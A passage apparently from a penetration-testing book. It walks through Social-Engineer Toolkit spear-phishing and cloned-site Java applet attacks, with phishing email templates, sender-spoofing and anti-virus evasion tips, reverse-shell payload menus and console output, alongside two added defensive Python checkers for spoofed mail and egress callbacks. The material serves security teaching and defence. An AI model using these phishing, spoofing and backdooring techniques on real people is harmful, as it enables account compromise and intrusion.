Next line of the body: The mail server will be replaced today with 
Next line of the body: a new version that is faster and (finally) 
Next line of the body: has more storage capacity. 
Next line of the body: Please review the attached document, which 
Next line of the body: outlines changes you must make to access 
Next line of the body: your account. You must make these changes to 
Next line of the body: ensure uninterrupted access to your email. 
Next line of the body: Bob Smith 
Next line of the body: Senior Manager 
You will be offered the option of using your own Gmail account to launch the attack 
(1) or using your own server or open relay (2). If you use a Gmail account, it is likely 
that the attack will fail, and you will receive the following message: 

[!] Unable to deliver email. Printing exceptions message 

below, this is most likely due to an illegal attachment. If using GMAIL 
they inspect PDFs and it is most likely getting caught. 

Gmail inspects outgoing emails for malicious files, and is very effective at identifying 
payloads produced by SEToolkit and the Metasploit Framework. If you have to send 
a payload using Gmail, use Veil-Evasion to encode it first. 

It is recommended that you use the sendmail option to send executable files; 
furthermore, it allows you to spoof the source of the e-mail to make it appear as 
though it originated from a trusted source. 

The target will receive the following e-mail message: 



To: robert.beggs@digitaldefence.ca 
Attachment: template.doc (230 B) 

The email server will be upgraded today after hours. 

The new server will be faster, have improved anti-virus, and give everyone more storage 
space for their emails. 

Please review the attached document for the changes that you will have to make BEFORE you 
can access your email tomorrow morning. 

Jon Smith, Network Manager 

DigitalDefence 

###-###-#### (office) 



To ensure that an e-mail is effective, the attacker should take care of the 
following points: 

• The content should provide a "carrot" (the new server will be faster, have 
improved anti-virus) and a "stick" (changes you will have to make before you 
can access your e-mail). Most people respond to immediate calls for action, 
particularly when it affects them. 

• In the sample given previously, the attached document is titled template.doc. 
In a real-world scenario, this would be changed to Email instructions.doc. 

• Ensure that your spelling and grammar are correct, and the tone of the 
message matches the content. 
• The title of the individual sending the e-mail should match the content. 

If the target organization is small, you may have to spoof the name of a 
real individual and send the e-mail to a small group that does not normally 
interact with that person. 

• Include a phone number — it makes the e-mail look more "official", and there 
are various ways to use commercial voice over IP solutions to obtain a short- 
term phone number with a local area code. 

Once the attack e-mail is sent to the target, successful activation (the recipient 
launches the executable) will create a reverse Meterpreter tunnel to the attacker's 
system. The attacker will then employ Meterpreter and other tools to conduct typical 
post-exploitation activities. 
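Seen from the receiving mail server, the spear-phishing message described above has properties that can be checked mechanically: the From domain disagrees with the envelope sender, no SPF or DKIM result vouches for the message, and it carries a document attachment. The following Python is an added example, not code from the book or from SEToolkit, that uses the standard email module to report those properties on two constructed messages. The addresses, headers and the list of attachment types treated as risky are assumptions of the example.

```python
from email import message_from_string, policy
from email.utils import parseaddr

# Attachment types that commonly carry embedded payloads (assumption of this example).
RISKY_EXTENSIONS = {"doc", "docm", "xls", "xlsm", "pdf", "exe", "zip", "rar", "vbs", "js"}

# Constructed message modelled on the spear-phishing example above: the From header
# claims a manager at the target, the envelope sender is a relay elsewhere, nothing
# authenticated the sender, and a document is attached. All values are made up.
PHISH_EMAIL = """\
Return-Path: <relay-user@mail.example.net>
Received: from mail.example.net ([203.0.113.25]) by mx.target.com with ESMTP; Wed, 18 Sep 2013 14:49:01 -0400
From: "Bob Smith" <bob.smith@target.com>
To: john@target.com
Subject: New email server
MIME-Version: 1.0
Content-Type: multipart/mixed; boundary="boundary42"

--boundary42
Content-Type: text/plain

The mail server will be replaced today. Please review the attached document.
--boundary42
Content-Type: application/msword; name="Email instructions.doc"
Content-Disposition: attachment; filename="Email instructions.doc"
Content-Transfer-Encoding: base64

0M8R4KGxGuEAAAAAAAAAAAAAAAAAAAAA
--boundary42--
"""

# Constructed legitimate message for comparison: envelope and From agree and the
# receiving server recorded a passing SPF check.
CLEAN_EMAIL = """\
Return-Path: <bob.smith@target.com>
Authentication-Results: mx.target.com; spf=pass smtp.mailfrom=target.com
From: "Bob Smith" <bob.smith@target.com>
To: john@target.com
Subject: Lunch on Friday

Are you free at noon?
"""


def domain_of(header_value):
    """Lower-cased domain part of an address header, or '' if there is none."""
    return parseaddr(header_value or "")[1].rpartition("@")[2].lower()


def assess_message(raw):
    """Return a list of findings suggesting a spoofed sender or a risky attachment."""
    msg = message_from_string(raw, policy=policy.default)
    findings = []

    from_dom = domain_of(msg.get("From"))
    env_dom = domain_of(msg.get("Return-Path"))
    if from_dom and env_dom and from_dom != env_dom:
        findings.append(f"From domain {from_dom} differs from envelope sender domain {env_dom}")

    # A receiving server that checked SPF/DKIM records the verdict in this header.
    auth = (msg.get("Authentication-Results") or "").lower()
    verified = "spf=pass" in auth or "dkim=pass" in auth
    if not verified:
        findings.append("no passing SPF or DKIM result recorded for this message")

    for part in msg.iter_attachments():
        name = part.get_filename() or ""
        ext = name.rpartition(".")[2].lower()
        if ext in RISKY_EXTENSIONS and not verified:
            findings.append(f"attachment {name!r} arrived from an unverified sender")
    return findings


if __name__ == "__main__":
    for label, raw in (("phish", PHISH_EMAIL), ("clean", CLEAN_EMAIL)):
        print(label, assess_message(raw) or ["no findings"])
```

The domain comparison is what a spoofed sendmail source trips over: the attacker can write any From header, but the envelope sender and the Received chain are recorded by the relaying servers. Publishing SPF and DKIM for the organisation's own domain is what lets the receiving server mark a message that claims to be internal but did not come from the internal mail system.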

Using a website attack vector - Java Applet Attack Method 

The Java Applet Attack Method uses an infected Java applet to load a malicious 
application onto the target system. This attack is favored by many attackers 
because it is highly reliable, and it is effective against Windows, Linux, and 
Mac OS X systems. 

To launch the attack, open SEToolkit and select option 2) Website Attack 
Vectors from the main menu. Then select option 1) Java Applet Attack Method 
to launch the initial menu, as shown in the following screenshot: 

set:webattack>1 

The first method will allow SET to import a list of pre-defined web 
applications that it can utilize within the attack. 

The second method will completely clone a website of your choosing 
and allow you to utilize the attack vectors within the completely 
same web application you were attempting to clone. 

The third method allows you to import your own website, note that you 
should only have an index.html when using the import website 
functionality. 

1) Web Templates 

2) Site Cloner 

3) Custom Import 
The options for web template are Java Required, Gmail, Google, Facebook, 
Twitter, and Yahoo. The Java Required page, as shown in the following screenshot, 
is usually effective because it directly prompts the user to update a vital piece of 
software before continuing. 

Java Required! 

Welcome to the website, you must have Java in order to view this page properly. Ensure that the Microsoft 
signed Java box that pops up is accepted to load the site content. 

Words from our CEO: "Java Required to view content." 

Instructions to view the website: 

Welcome to the site! This site requires Java in order to run properly. 

1. A pop-up box will prompt, please hit "Yes". This may take a few 
moments. 

2. This pop-up is signed through the Microsoft Corporation and will 
provide you with necessary updates to view the site. 

3. Once you have accepted, wait about 10 to 15 seconds and the page 
will load. 

You must first click "Run" for the signed Java component from 
Microsoft in order to view our site successfully. 



You can also choose to clone an existing site, such as the target's corporate website. 

After making the selection, the attacker is then prompted to determine if they use 
Port/ NAT forwarding and provide the IP address of the attacking machine for the 
reverse connection, as shown in the following screenshot: 

[-] NAT/Port Forwarding can be used in the cases where your SET machine is 
[-] not externally exposed and may be a different IP address than your reverse listener. 
set> Are you using NAT/Port Forwarding [yes|no]: no 
[-] Enter the IP address of your interface IP or if your using an external IP, what 
[-] will be used for the connection back and to house the web server (your interface address) 
set> IP address or hostname for the reverse connection: 192.168.43.130 
[-] SET supports both HTTP and HTTPS 
[-] Example: http://www.thisisafakesite.com 
set:webattack> Enter the url to clone: http://www.digitaldefence.ca 




Word wrapping is not well handled by the SEToolkit, and it is 
common that a typed response will wrap back and overwrite a 
part of the command line. 



After providing the required URL, SEToolkit will start the site cloning process, 
as shown in the following screenshot. When completed, the application will start 
generating the payload and supporting files (the .jar archive and the cloned 
index.html file). 

[*] Cloning the website: http://www.digitaldefence.ca 

[*] This could take a little bit ... 

[*] Injecting Java Applet attack into the newly cloned website. 

[*] Filename obfuscation complete. Payload name is: nAo2ZBQkt9X 

[*] Malicious java applet website prepped for deployment 



The next stage includes the selection of the payload. If stealth is especially important, 
use option 17 to select an executable that has been encoded using veil, as shown in 
the following screenshot: 



 1) Windows Shell Reverse_TCP               Spawn a command shell on victim and send back to attacker 
 2) Windows Reverse_TCP Meterpreter         Spawn a meterpreter shell on victim and send back to attacker 
 3) Windows Reverse_TCP VNC DLL             Spawn a VNC server on victim and send back to attacker 
 4) Windows Bind Shell                      Execute payload and create an accepting port on remote system 
 5) Windows Bind Shell X64                  Windows x64 Command Shell, Bind TCP Inline 
 6) Windows Shell Reverse_TCP X64           Windows X64 Command Shell, Reverse TCP Inline 
 7) Windows Meterpreter Reverse_TCP X64     Connect back to the attacker (Windows x64), Meterpreter 
 8) Windows Meterpreter All Ports           Spawn a meterpreter shell and find a port home (every port) 
 9) Windows Meterpreter Reverse HTTPS       Tunnel communication over HTTP using SSL and use Meterpreter 
10) Windows Meterpreter Reverse DNS         Use a hostname instead of an IP address and spawn Meterpreter 
11) SE Toolkit Interactive Shell            Custom interactive reverse toolkit designed for SET 
12) SE Toolkit HTTP Reverse Shell           Purely native HTTP shell with AES encryption support 
13) RATTE HTTP Tunneling Payload            Security bypass payload that will tunnel all comms over HTTP 
14) ShellCodeExec Alphanum Shellcode        This will drop a meterpreter payload through shellcodeexec 
15) PyInjector Shellcode Injection          This will drop a meterpreter payload through PyInjector 
16) MultiPyInjector Shellcode Injection     This will drop multiple Metasploit payloads via memory 
17) Import your own executable              Specify a path for your own executable 
Select the encoding option to bypass local anti-virus on the target system; the most 
effective of them is the fourth option, Backdoored Executable, as shown in the 
following screenshot: 

Select one of the below, 'backdoored executable' is typically the best. However, 
most still get picked up by AV. You may need to do additional packing/crypting 
in order to get around basic AV detection. 

1) shikata_ga_nai 

2) No Encoding 

3) Multi-Encoder 

4) Backdoored Executable 



The application will prompt for the listening port, and then start generating code for 
common ports (25, 53, 80, 443, and so on) on the victim's machine, as shown in the 
following screenshot: 

set:encoding>4 

set:payloads> PORT of the listener [443]: 

[*] Generating x86-based powershell injection code for port: 22 

[*] Generating x86-based powershell injection code for port: 53 

[*] Generating x86-based powershell injection code for port: 443 

[*] Generating x86-based powershell injection code for port: 21 

[*] Generating x86-based powershell injection code for port: 25 

[*] Finished generating powershell injection bypass. 

[*] Encoded to bypass execution restriction policy... 

[-] Backdooring a legit executable to bypass Anti-Virus. Wait a few seconds... 

[*] Backdoor completed successfully. Payload is now hidden within a legit executable. 



Now comes the social engineering step — the attacker has to convince the targeted 
person to connect to the IP address of the listening system. If the target browses to 
that address, they will be directed to the cloned site hosted on the listener. 
The site will present the targeted person with a security warning, as shown in the 
following screenshot, indicating that an application needs to be executed in order to 
access the site. 

Security Warning 




If the person chooses to execute the application, a reverse shell (depending 
on the selected payload) will be formed between their computer and the 
attacker's computer. 

The two attacks presented demonstrate the different approaches used by the 
SEToolkit to gain control of a target's computer using a reverse shell or a similar 
payload. An attacker can extend the control in a number of ways, such as using 
a VNC payload or placing a RATTE. 

However, these attacks are intrusive — it is possible that the reverse shell may 
trigger an egress alarm at the firewall as it connects to the attacker's machine. 
More importantly, the payload may be reverse engineered to identify information 
about the attacker. 
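A defender-side version of the egress alarm just mentioned, as an added example that is not part of the book or of SEToolkit: it runs a simple rule over constructed firewall log lines, flagging workstation connections (allowed or denied) to unapproved Internet hosts on the ports SET offered for the listener, and correlating several watched ports to one host, which is what a callback trying port after port looks like. The log format, the workstation subnet and the allowlist are assumptions.

```python
import ipaddress
from collections import defaultdict, namedtuple

# Ports SET offered for the listener in the section above (22, 53, 443, 21, 25);
# workstations rarely need direct Internet access on these and go via relays instead.
WATCHED_PORTS = {21, 22, 25, 53, 443}
# Hypothetical per-port allowlist of hosts a workstation may reach directly
# (mail relay, resolver, web proxy), constructed for this example.
ALLOWED = {25: {"203.0.113.10"}, 53: {"203.0.113.53"}, 443: {"203.0.113.80"}}
WORKSTATIONS = ipaddress.ip_network("192.168.43.0/24")
INTERNAL = [ipaddress.ip_network(n) for n in ("10.0.0.0/8", "172.16.0.0/12", "192.168.0.0/16")]

# Constructed firewall log lines: "<ts> <src>:<sport> -> <dst>:<dport> <proto> <action>"
SAMPLE_LOG = [
    "2014-03-01T09:12:01 192.168.43.17:51234 -> 203.0.113.80:443 TCP ALLOW",  # via proxy
    "2014-03-01T09:12:05 192.168.43.17:51240 -> 203.0.113.53:53 UDP ALLOW",   # resolver
    "2014-03-01T09:13:10 192.168.43.17:51302 -> 198.51.100.7:443 TCP ALLOW",  # unknown host
    "2014-03-01T09:13:11 192.168.43.17:51303 -> 198.51.100.7:53 TCP ALLOW",   # TCP/53, same host
    "2014-03-01T09:14:00 192.168.43.22:51400 -> 192.168.43.5:445 TCP ALLOW",  # internal SMB
    "2014-03-01T09:14:30 192.168.43.17:51310 -> 198.51.100.7:22 TCP DENY",    # blocked attempt
]

Alert = namedtuple("Alert", "ts src dst dport reason")

def parse_line(line):
    ts, src, _, dst, proto, action = line.split()
    src_ip = src.rsplit(":", 1)[0]
    dst_ip, dport = dst.rsplit(":", 1)
    return ts, src_ip, dst_ip, int(dport), proto, action

def check_egress(lines):
    """Flag workstation connections (allowed or denied) to unapproved Internet hosts on watched ports."""
    alerts = []
    for line in lines:
        ts, src, dst, dport, _, action = parse_line(line)
        src_ip, dst_ip = ipaddress.ip_address(src), ipaddress.ip_address(dst)
        if src_ip not in WORKSTATIONS or any(dst_ip in net for net in INTERNAL):
            continue  # not a workstation, or internal traffic rather than egress
        if dport not in WATCHED_PORTS or dst in ALLOWED.get(dport, set()):
            continue  # ordinary port, or an approved relay/proxy/resolver
        reason = "blocked outbound attempt" if action == "DENY" else "egress to unapproved host"
        alerts.append(Alert(ts, src, dst, dport, reason))
    return alerts

def multiport_callbacks(alerts):
    """Pairs where one workstation reached the same Internet host on two or more watched ports."""
    ports = defaultdict(set)
    for a in alerts:
        ports[(a.src, a.dst)].add(a.dport)
    return {pair for pair, seen in ports.items() if len(seen) >= 2}
```

On the sample lines the two proxied and resolver connections pass, the three attempts to 198.51.100.7 are flagged, and that host is reported as a multi-port callback target.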

Finally, the goal of the attack may not be an immediate compromise; instead, the 
attacker may wish to collect user credentials to support a later attack, or to reuse 
the credentials at multiple places on the Internet. So, let's examine a credential 
harvesting attack. 